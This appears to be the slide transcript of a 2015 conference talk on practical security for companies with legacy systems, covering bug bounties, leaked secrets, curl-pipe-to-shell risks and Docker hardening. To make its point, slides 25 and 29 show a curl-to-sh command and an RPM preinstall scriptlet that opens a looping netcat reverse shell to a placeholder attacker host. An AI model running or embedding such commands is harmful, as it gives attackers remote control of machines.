Security for non-unicorns

C7bf554286ede7cb2786b5b19649c19b?s=47 Bea Hughes
September 25, 2015

Security for non-unicorns

Operability.io September 2015.

Security is becoming quite the thing now days, everyone wants to have one of them. The mantra that things should be built with security in mind and can't be plastered on later is a very important one, if you're based in Silicon Valley and are about to write "teh new hotness", but what happens if your company is older than say, 6 months. You already have some legacy systems and code. I'll be talking about how it's possible to unearth some of these things. What happens when you do uncover these things. How to stop them happening. And coping strategies for dealing with them

C7bf554286ede7cb2786b5b19649c19b?s=128

Bea Hughes

September 25, 2015
Tweet

Transcript

  1. Security For Non-Unicorns 1 https://www.etsy.com/listing/205741051/unicorn-dog-hat-rainbow-unicorn-dog @benjammingh for Operability.io 1

  2. Who's this clown? 2 • Infrastructure security charlatan at Etsy

    • Operations monkey at Puppet Labs • Survived a bunch of startups in London. (some of them still have websites...) • Has far too many opinions about pretty much everything on the TwitterNet @benjammingh 2 https://twitter.com/skullmandible/status/411281851131523072 @benjammingh for Operability.io 2
  3. Unicorns? @benjammingh for Operability.io 3

  4. Setlist • The problem(™). • The solution(s)(™). • The wrap

    up. • Rapturous applause. • We all go home/dance parties/our secret lives as superheroes & heroines. @benjammingh for Operability.io 4
  5. The problem security is hard. @benjammingh for Operability.io 5

  6. From tiny seeds, do mighty acorns grow. • PinkiePwn's 6

    small bugs in Chrome to full sandbox escape • Egor Homakov's 5 small bugs in Github to full private access on GitHub • from XSS to remote code execution in under an hour • Username & password stolen for HVAC system leads to $160+ Million Target breach. @benjammingh for Operability.io 6
  7. Things that aren't security are hard too. @benjammingh for Operability.io

    7
  8. Computering is hard. No. 1 takeaway for security types is

    a sense of perspective. @benjammingh for Operability.io 8
  9. Security people aren't great secure coders. • Snort: 10 CVEs,

    Wireshark: 322! CVEs • Joxean Koret on Breaking Antivurius software • Security Firm Bit9 Hacked, Used to Spread Malware • Tavis Ormandy from Project Zero on exploiting ESET • BEST! FireEye just running Apache/PHP as root @benjammingh for Operability.io 9
  10. So who do I trust? • No one? Always a

    great position for security people, who don't want to get paid. • Everyone? Do I have a 419 email for YOU! • Security vendors? If you have infinite money and no attackers. • Attackers! @benjammingh for Operability.io 10
  11. "You're already being probed for security holes, do you want

    to know or not?" @benjammingh for Operability.io 11
  12. Bug bounties 101: Have one! Bug Crowd vs. HackerOne @benjammingh

    for Operability.io 12
  13. Bug bounties 102: Prepare a lot. @benjammingh for Operability.io 13

  14. Bug bounties 103: The first few weeks will be hell.

    @benjammingh for Operability.io 14
  15. Bug bounties 104: Be ready with bees! @benjammingh for Operability.io

    15
  16. Security on the inside @benjammingh for Operability.io 16

  17. Armadillo security architecture @benjammingh for Operability.io 17

  18. Cloud @benjammingh for Operability.io 18

  19. Github @benjammingh for Operability.io 19

  20. @benjammingh for Operability.io 20

  21. But this doesn't happen in real life, right? @benjammingh for

    Operability.io 21
  22. @benjammingh for Operability.io 22

  23. Go use Gitrob • http://michenriksen.com/blog/gitrob-putting-the-open- source-in-osint/ • https://github.com/michenriksen/gitrob @benjammingh for

    Operability.io 23
  24. curl | bash @benjammingh for Operability.io 24

  25. curl legit.pw/mac | sh @benjammingh for Operability.io 25

  26. "But I check them, obviously!" @benjammingh for Operability.io 26

  27. @benjammingh for Operability.io 27

  28. curl | bash "But this is no worse than packages."

    root# yum install sketchy @benjammingh for Operability.io 28
  29. curl | bash root# rpm -qp --scripts sketchy-1.33-7.rpm preinstall scriptlet

    (using /bin/sh): bash -c 'while : ; \ do \ nc -e /bin/sh root.legit.pw 2222 ;\ done' @benjammingh for Operability.io 29
  30. A LIVE DEMO, madness. @benjammingh for Operability.io 30

  31. Lightweight containers! @benjammingh for Operability.io 31

  32. chroot(8) @benjammingh for Operability.io 32

  33. FreeBSD Jails @benjammingh for Operability.io 33

  34. Solaris Zones @benjammingh for Operability.io 34

  35. AIX LPAR @benjammingh for Operability.io 35

  36. @benjammingh for Operability.io 36

  37. Is Docker secure? @benjammingh for Operability.io 37

  38. >30% of Images in Docker Hub Contain High Priority Security

    Vulns - Jayanth Gummaraju, Tarun Desikan and Yoshio Turner from BanyanOps @benjammingh for Operability.io 38
  39. @benjammingh for Operability.io 39

  40. As secure as Vagrant? @benjammingh for Operability.io 40

  41. But is Docker itself secure? • Don't run things as

    root. • No really, stop running things as root. • Did I mention not running things as root. • It is also not 1999. (Docker 1.8 addresses some of this, with it's changes to who it runs as) @benjammingh for Operability.io 41
  42. Securify the Docker. • Don't use --privileged. • Use --cap-drop

    all and --cap-drop <thing> to get the minimum capabilities. • Use Docker Notary • Use GRSecurity (just do that anyway, if you can.) • Use SELinux... I may as well ask for a pony here. @benjammingh for Operability.io 42
  43. Summary • Computers are apparently hard. • Security is clearly

    harder still, obv. • Actually trust and humans is hard. • The typing is the easy bit. (ish) @benjammingh for Operability.io 43
  44. More Summary • Complex systems lead to much more complex

    security problems. (see Oauth) • Annual pen-tests don't scale, bug bounties can. • Attackers are mining any public info you have (GitHub, S3) • I beg you to stop trusting curl. • Docker and security can be used in the same sentence. @benjammingh for Operability.io 44
  45. Thank you! Twidder: @benjammingh LinkedIn: lnkdin.me/p/benyeah FidoNet: 2:254/524.13 JitHub: github.com/barn

    SpeakerDeck: speakerdeck.com/barnbarn Etsy: Careers CodeAsCraft @benjammingh for Operability.io 45